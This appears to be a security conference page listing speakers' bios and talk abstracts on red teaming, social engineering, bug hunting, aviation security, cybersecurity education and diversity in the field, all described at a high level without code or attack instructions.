With nearly two decades of experience in the industry, Oscar serves as CTO at FRSecure where he manages our in-house team of experts spanning red teaming, blue teaming, and consulting operations. Aside from playing a crucial role in FRSecure’s leadership, Oscar is an experienced speaker and contributor to the information security industry as a whole. He regularly gives talks at information security conferences and hosts two different podcasts– The Hackle Box (onthly), and The Unsecurity Podcast (weekly), to inform listeners of current events and best practices both from a technical and business standpoint. To Oscar, our focus on fixing a broken industry means leading by example and showing his peers the importance of doing things correctly, not just conveniently. “In an industry clouded with unnecessary tools, acronyms, and easy button solutions, we strive to do things the right way. We aim not only to serve our clients but set an example for our peers in the security industry too.” When Oscar isn’t helping folks with security, you might find him strumming a guitar or fishing.
Hackers in Space!!! (Towel, duct tape & a red hose! Anything's a tool if you hack it hard enough.)
Jayson E. Street
Talk Description:
“I don't care about what anything was designed to do, I care about what it can do.”
~ Gene Kranz (aerospace engineer - NASA's second Chief Flight Director - Hacker)
In everyday life we tend to take for granted what roles a device is used for, never considering what other ways that same device can be utilized to help or harm.
Another quote I love is this one
“Any sufficiently advanced technology is indistinguishable from magic”
~ Arthur C. Clarke
It’s because it got me thinking to the point of where I adapted it as I see it relating to what I do.
“Any sufficiently common technology is indistinguishable from an attack tool”
~ Jayson E. Street
Having successfully robbed banks, organizations & governments all over the world. One of the key findings is how so many overlook potentially dangerous devices & occurrences since they appear to be everyday items & events.
In this talk we will not just go over the devices I’ve used successfully to compromise companies globally.I’ll show that with proper understanding and education the risk of these attacks can be minimized and how this process of education can be used for more than unknown devices on a network.
I will also show a demo of a novel way of using a drone in a Social Engineering attack to get the employees to bring in and execute the payloads without me ever having to step foot on the property or even ask them to.
Speaker Bio:
A "notorious hacker" by FOX25 Boston, "World Class Hacker" by National Geographic Breakthrough Series and described as a "paunchy hacker" by Rolling Stone Magazine. He however prefers if people refer to him simply as a Hacker, Helper & Human.
The Chief Chaos Officer of Truesec a global cybersecurity solutions provider. The author of the "Dissecting the hack: Series" (which is currently required reading at 5 colleges in 3 countries that he knows of). Also the DEF CON Groups Global Ambassador. He's spoken at DEF CON, DEF CON China, GRRCon, DerbyCon at several other 'CONs & colleges on a variety of Information Security subjects. He was also a guest lecturer for the Beijing Institute of Technology for 10 years.
He loves to explore the world & networks as much as he can. He has successfully robbed banks, hotels, government facilities, Biochemical companies, etc.. on five continents (Only successfully robbing the wrong bank in Lebanon once all others he was supposed to)!
*He is a highly carbonated speaker who has partaken of Pizza from Bulgaria to Brazil & China to The Canary Islands. He does not expect anybody to still be reading this far but if they are please note he was proud to be chosen as one of Time's persons of the year for 2006.
TBD
Thomas 'dawgyg' DeVoss
Talk Description:
TBD
Speaker Bio:
dawgyg is a Bug Bounty Hunter, Reformed Blackhat and Head of AppSec at Braze.
He has been awarded over $2 Million Dollars in bug bounty payouts on HackerOne's platform and was named their 2020 Most Valuable Hacker.
Wall of Fame: Yahoo, Mail.Ru, Mapbox, Imgur, GM, Adobe, AOL, Zynga, Viadeo, Uber, Microsoft, Netflix
CVEs:
CVE-2018-1042
CVE-2017-0913
CVE-2017-0912
Wall of Fame credits:
https://contact.security.aol.com/hof/
https://www.zynga.com/security/whitehats
http://www.viadeo.com/aide/security/
https://www.maxcdn.com/security/
https://hackerone.com/dawgyg/thanks
Other info:
https://hackerone.com/dawgyg
https://bugcrowd.com/dawgyg
http://vulnerability-lab.com/show.php?user=Tommy%20DeVoss
https://packetstormsecurity.com/files/134073/Virgin-Mobile-Cross-Site-Scripting.html
https://moodle.org/mod/forum/discuss.php?d=364381#p1469490
The Bug Hunters Methodology: Application Analysis v1.8
Jason Haddix
Talk Description:
The Bug Hunter's Methodology (TBHM) is a series of talks done by Jason exposing new advents in tools, tactics, and procedures used in bug hunting. TBHM Application Analysis dives into the question: "What do I do after recon?" In this talk, Jason will explore the mindset of approaching a hardened web target and how he breaks up finding vulnerabilities across its' stack. Many talks can teach you how to exploit a certain vulnerability, less can teach you how to find out where they are in complex pieces of software. TBHM Application Analysis also covers Jason's personal tips/tricks in the areas of automation, content discovery, javascript analysis, spidering, parameter analysis, functionality "heatmapping", and more. Version 1.8 more vulnerability specificity, web fuzzing techniques, and context about how to interpret responses when fuzzing web applications.
Speaker Bio:
Jason Haddix is the CISO and “Hacker in Charge” at BuddoBot, a world-class adversary emulation consultancy. He’s had a distinguished 15-year career in cybersecurity previously serving as the CISO of Ubisoft, Head of Trust/Security/Operations at Bugcrowd, Director of Penetration Testing at HP, and Lead Penetration Tester at Redspin. He has also held positions doing mobile penetration testing, network/infrastructure security assessments, and static analysis. Jason is a hacker and bug hunter to the core, and he is ranked 51st all-time on Bugcrowd’s leaderboards. Currently, he specializes in recon and web application analysis. Jason has also authored many talks on offensive security methodology, including speaking at cons such as; DEFCON, Black Hat, OWASP, RSA, Nullcon, SANS, IANS, BruCon, Toorcon, and many more. Jason currently lives in Colorado with his wife and three children.
What Security Teams Can Learn From Looking at Aviation Safety, from an AF pilot and Safety Officer Turned Cyberwarfare Officer
Joshua Mason
Talk Description:
In order to reduce incidents and maintain air dominance, the United States Air Force aviation community has developed a culture of continuous development through focused, purposeful, and structured feedback.
By utilizing the tactics, techniques, and practices developed by Air Force aviators, the security community can better utilize lessons learned through failure and success and improve from engagement to engagement or incident to incident.
Josh Mason, will introduce the mindset, methodology, and framework for implementing this practice in your organization.
Speaker Bio:
Josh is a cybersecurity professional who transitioned from being a military cargo pilot to being a cyberwarfare officer in the US Air Force. Josh has since taught at the US Air Force Special Operations School, the DoD Cyber Crime Center's Cyber Training Academy, and the veteran training organization WithYouWithMe. Josh built out the latest version of Penetration Testing Student and the eLearnSecurity Junior Penetration Tester exam alongside the team at INE. Josh was also a sales engineer for SimSpace, leading their partner enablement program. Josh has founded several non-profit organizations aimed at helping individuals start their careers in cybersecurity. Josh has led career workshops and spoken at Wild West Hackin' Fest. Currently, Josh is an instructor at Neuvik Solutions, providing courses, engagement management, and advanced assessments to clients.
Researching the Researchers: Using Their Work to Secure Aviation and Aerospace
Lost0x01
Talk Description:
This shallow dive into some of the research being done to identify vulnerabilities in the Aviation and Aerospace industry will take a look at a few researchers, some of their research and how we turn that research into actionable plans to improve security. We will cover topics including ADS-B spoofing, EFB tampering, TCAS, ILS and more, and how that research can be used to help secure the next generation of Avionics technology.
Speaker Bio:
Lost is a Senior Intelligence Analyst at a large aerospace organization with a focus on Malware and APTs. His other roles within the organization include Threat Hunting, Product Security Liaison and dabbling in Detection Engineering. Prior to the 2+ years in his current role he spent 3 years working as a contract incident responder covering multiple industries and organizations. Before entering the security field, Lost was a Master Mechanic and a Chef in several Atlanta area restaurants. Outside of his current role Lost enjoys his time being a dad, sailing as often as he can, tattoos, cooking, and helping people break into the industry through mentoring students and helping with Aviation themed Cyber challenges and CTFs
CVE EDU
Robert "LTNBOB" Theisen
Talk Description:
In this talk led by Robert "LTNBOB" Theisen, the state of IT & Cybersecurity education is discussed as if it was a vulnerability with a CVE assigned. He will be sharing his experience on what works and does not work in college environments, private industry and small communities. This talk is for all skill levels and will assist attendees in identifying the best ways to learn in this field. Solutions will be proposed to assist learners in demanding a higher quality education focused on developing relevant skills in Cybersecurity. The ultimate goal is to encourage others to become part of the movement to reform IT & Cybersecurity education.
Attendees can expect to gain the following from this talk:
- A Unique Perspective on IT & Cybersecurity education
- Methods and strategies to identify the best educational options (formal & informal) for your career
- Home Lab Tips & Strategies
- How to become an Educator that can lead mentored learning communities
- How to hold educational institutions accountable for the quality of education
- TTPs for IT & Cybersecurity teachers on how to best prepare students
- Influencing change
Speaker Bio:
Robert "LTNBOB" Theisen is fascinated by technology as a tool to empower humanity to do more good in the world than bad. My calling is to engage, enlighten and empower others to be all they can be. Learning is part of his daily regimen and believes learning is the single most empowering thing one can do. Education is not just limited to organizations that grant degrees. We live in an era where we can start learning just about anything with one keyword search. High quality guidance from a teacher or mentor can accelerate the learning process.
He loves learning but loves to empower others even more. He never takes off my IT/infosec professional hat and never will so long as he is preparing others to succeed through mastering the various tactics, techniques, procedures and tools we have at our disposal. None of his accomplishments would be possible without great mentors, friends, family, the Internet and God.
I'm always open to learning about new opportunities especially if the outcome leads to better lives for those that choose to use what I teach.
Accomplishments & Focus:
- Revitalizing college IT programs
- Developing IT & Cybersecurity curriculum for community colleges
- Assisted Hack The Box in developing modules in the Penetration Tester path on Hack The Box Academy
- Actively assisting thousands of learners with breaking into IT & Cybersecurity
- Creating beginner friendly IT & Cybersecurity content for the ltnlabs YouTube channel
- Partnering with learner focused institutions & communities to improve the quality of education
TBD
Tiffany M. Snyder
Talk Description:
TBD
Speaker Bio:
Tiffany joined NASA in 2018 with over 20 years of information technology and cybersecurity experience in Air Force Combat Command, Air Force Space Command, and as a Special Agent with the Department of Defense. Tiffany holds a Master of Science degree in Digital Forensics from the University of Central Florida, a Bachelor of Science degree in Earth Science from SUNY Buffalo State College, and various cybersecurity and IT certifications. At NASA, Tiffany first served as a Project Manager for the RISCS project on the Cybersecurity Infrastructure team. She then served as the Deputy Chief Information Security Officer at Kennedy Space Center beginning in 2019, where she led the Assessment and Authorization team. Currently Tiffany is the Deputy Chief of the Cybersecurity Mission Integration Office within the Cybersecurity; PrivacyDivision, Office of the Chief Information Security Officer, for NASA.
In her spare time, Tiffany enjoys paddleboarding, snorkeling, and surfing with her family, gardening, and tending to her ‘zoo’ of pets.
Me Time: It's OK to Take a Break from It All
Don Donzal AKA @ethicalhacker
Talk Description:
Who am I? Why Am I here? What kind of impact can I make on the world, my community, my family, or even myself in the time remaining on this isolated blue marble? Does it even matter? Am I just being selfish in thinking this way when there are bills to pay, mouths to feed and a world in flux? For argument’s sake, let’s just assume that you do matter and thinking about such questions is not only unselfish but healthy. This then leads to other questions… What do I want? What should I avoid? What makes me happy?
In this very personal talk, Don gets brutally honest about himself and life in the infosec community. He explores the ideas behind what really is a sabbatical, should you take the plunge, what to do during one, best ways to take advantage of your time and lack of income, preparing beforehand and much more. Don doesn’t claim to have all of the answers and maybe not even any. But if life truly is about the journey and not the destination, then this talk will help us all, speaker and audience alike, probe the depths of ourselves and encourage your own journeys. And maybe together we’ll find there’s more to all of this than the number 42.
Speaker Bio:
Father, executive, community builder, passionate technologist and life-long learner who blames his parents for his entrepreneurial tendencies. Don is proud that his son graduated HS early to fulfill his dream of becoming a United States Marine and that his daughter is becoming a strong, determined woman who loves writing even more than he does. Being the founder of The Ethical Hacker Network (EH-Net) Online Magazine and Community (acquired by eLearnSecurity) and ChicagoCon as well as having worked for large and small organizations in both the private and public sectors, Don has been part of the hacker/infosec/cybersec community for decades.
Robbing A Bank Over The Phone - How An Expert Social Engineer Can Convince You To Do Anything
Joshua Crumbaugh
Talk Description:
In this intense talk, Joshua brings the audience along for the ride on one of the most advanced social engineering attacks he's ever executed - robbing a bank over the phone.
This keynote address is an engaging and entertaining talk about the experiences of an expert social engineer. Audiences will be on the edge of their seats as they listen to real audio of Joshua convincing the Vice President of a bank to give up full access to his computer and eventually the entire facility. Attendees will walk away with a better understanding of how hackers/con men can gain access to your corporations and learn how to apply lessons learned in their professional and personal lives; all while hearing one of the most entertaining accounts from one of the best social engineers in the industry.
Keynote Attendees will learn:
● How a hacker will exploit employees to gain access to restricted areas; both offline and
online.
● How to identify social engineering attacks
● The importance of cyber security awareness and training in the workplace
● Best practices for preventing common hacker attacks like Phishing emails, etc.
● Actionable items for mitigating potential risk for a cyber security attack
Speaker Bio:
Joshua Crumbaugh is an internationally renowned cybersecurity expert, published author and keynote speaker. With decades of experience in ethical hacking and social engineering, Joshua gained worldwide recognition for his ability to infiltrate even the most secure networks as a penetration tester. His expertise in this field has led him to found PhishFirewall, where he serves as CEO. Through his company's work and his own written contributions to cybersecurity, Joshua is dedicated to helping others understand the ever-evolving world of cybersecurity and how to stay safe in the digital age.
Breaking Barriers: Empowering Women in Cybersecurity and STEM
Samantha Bolet
Vanessa Morales
Angela Hill
Valentina Ruiz
Talk Description:
In the male-dominated fields of cybersecurity and STEM, women, and Latinas specifically, face unique challenges and barriers that can affect their success and advancement. However, these women possess valuable skills, perspectives, and experiences that can enrich and strengthen these fields. In this talk, we will explore the obstacles and opportunities that women encounter in cybersecurity and STEM, and discuss practical strategies for supporting and promoting their participation and leadership.
Through this talk, we will demonstrate how we can build a more equitable and dynamic future for cybersecurity and STEM and highlight these topics through a live panel with female Latina cybersecurity professionals and leaders from NBCUniversal.
Speaker Bio:
Samantha Bolet
Samantha Bolet is a technology leader, diversity advocate, and community builder who is passionate about empowering Latinas and underrepresented groups in tech.
Based out of NYC, Samantha Bolet is the Cofounder and Vice President of the non-profit organization Latinas in Cyber, which dedicates itself to promoting the presence and career success of Latinas within the cybersecurity industry. Samantha, alongside the LAIC executive team, focuses on program development, digital strategy, brand storytelling, and the development and execution of the LAIC Mentorship Academy.
Samantha is currently a Senior Privacy Program Manager in tech and previously, was a Senior Associate in the Cybersecurity Practice at KPMG. She holds a Masters of Science in Technology Management and Information Systems and a Bachelors of Arts in Political Science and Spanish, both from the University of Illinois at Urbana Champaign. She also holds a Data Privacy and Technology Certificate from Harvard Business School and the IAPP CIPM.
Vanessa Morales
Vanessa decided to enlist in the US Army Reserves at a young age and after coming back from nine months of training and knowing she wanted to pursue a STEM major, she started to pursue a degree in Chemical Engineering. Towards the end of her degree, she started her family with her husband and decided to switch her career path and start teaching herself how to code. With the mentality of becoming a software engineer, she decided why not, and dived right into Vanilla JS, Python, C++, and more. Although coding was fun, she was curious and purchased the Linux Basics for Hackers book, and a light bulb was lit. Cyber Security was her calling. Still and always willing to be a student, she is always on the roll to learn new topics and information about penetration testing, red teaming, and offensive security.
Vanessa is now a Security Architecture Analyst based in the East Coast and the Executive Director for the non-profit Latinas In Cyber (LAIC). Passionate for the success of beginners and diversifying the cybersecurity industry, Vanessa works, along-side the LAIC executive team, to create a community and opportunities to help assist those breaking into the field.
Angela Hill
Angela Hill is a security ‘veteran’ and executive leader with expertise in national security, intelligence, cloud, security, and program management. She has demonstrated herself as an entrepreneur, trusted executive advisor, and cybersecurity industry thought leader. Today, she supports the world's #1 cybersecurity company and is an online contributor on cyber topics. Angela aims to foster greater inclusion of underrepresented populations within the cybersecurity industry and is the president and co-founder of Latinas in Cyber (LAIC).
Valentina Ruiz
Valentina Ruiz recently graduated from the University of South Florida this past December with a Bachelors in Business Analytics and Information Systems. She recently completed her internship with Latinas in Cyber as a Program Manager, where she’s had the amazing opportunity to expand her management and cyber skills by assisting in creating the 2023 Mentorship Academy.
With cyber knowledge and management experience she’s currently pursuing her certificate in cybersecurity from ISC2, Governance, Risk, & Compliance Certificate, as well as looking for an entry level role that will expand her skills. Her experience interning as a Program Manager for a cyber nonprofit has only reinforced her desire to merge her cyber security skills and knowledge with her passion for the cyber security field, specifically data privacy and GRC.
